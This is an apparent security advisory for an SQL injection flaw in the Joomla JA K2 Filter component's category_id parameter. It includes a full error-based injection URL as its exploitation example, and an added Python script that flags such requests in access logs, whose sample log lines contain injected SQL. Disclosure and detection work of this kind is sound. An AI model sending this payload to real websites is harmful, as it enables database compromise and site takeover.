SQL injection in Joomla! JA K2 Filter Component - #VU3420

Published: January 4, 2017
Vulnerability identifier: #VU3420
CSH Severity: Medium
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/U:Green
CVE-ID: N/A
CWE-ID: CWE-89
Exploitation vector: Remote access
Exploit availability: No public exploit available
Vendor: JoomlArt.com
Affected software:
Joomla! JA K2 Filter Component

Detailed vulnerability description

The vulnerability allows a remote attacker to execute arbitrary SQL commands in the vulnerable application.

The vulnerability exists due to insufficient sanitization of user-supplied data passed via the "category_id" HTTP GET parameter to /index.php in the ja-k2-filter-and-search component. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the web application database.

Successful exploitation may allow an attacker to gain complete control over the vulnerable website.

Exploitation example:

http://[host]/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27

The vulnerability was reported in version 1.2.2. Prior versions may also be affected.
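Because "category_id" should only ever carry an integer, requests to the com_jak2filter component with any other value in that parameter are a simple indicator for log review. The following Python is an added example, not code from the advisory or from JoomlArt: it parses constructed access-log lines (a sample, not real traffic), URL-decodes the query string, and flags com_jak2filter requests whose category_id is not a plain non-negative integer.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not real traffic). The second line carries a
# shortened, non-numeric category_id aimed at the com_jak2filter component.
SAMPLE_LOG = """\
203.0.113.10 - - [04/Jan/2017:10:00:01 +0000] "GET /index.php?option=com_jak2filter&view=itemlist&Itemid=135&category_id=12 HTTP/1.1" 200 5123
203.0.113.11 - - [04/Jan/2017:10:00:05 +0000] "GET /index.php?option=com_jak2filter&view=itemlist&Itemid=135&searchword=the&category_id=(select%201)&xf_2=5%27 HTTP/1.1" 500 311
203.0.113.12 - - [04/Jan/2017:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 8800
"""

# Common Log Format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_valid_category_id(value):
    """The remediation-side check: the parameter must be a bare integer
    (this is how a hardened handler should validate it before building SQL)."""
    return re.fullmatch(r"\d+", value) is not None

def flag_jak2filter_requests(log_text):
    """Return (client_ip, status, decoded category_id) for each request to
    option=com_jak2filter whose category_id fails is_valid_category_id()."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; skip rather than guess
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if query.get("option", [""])[0] != "com_jak2filter":
            continue
        for raw in query.get("category_id", []):
            # parse_qs already decoded once; decode again to catch double-encoded values
            value = unquote(raw)
            if not is_valid_category_id(value):
                findings.append((m.group("ip"), int(m.group("status")), value))
    return findings

if __name__ == "__main__":
    for ip, status, value in flag_jak2filter_requests(SAMPLE_LOG):
        print(f"{ip} status={status} category_id={value!r}")
```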

Remediation

Update to version 1.2.5.

Sources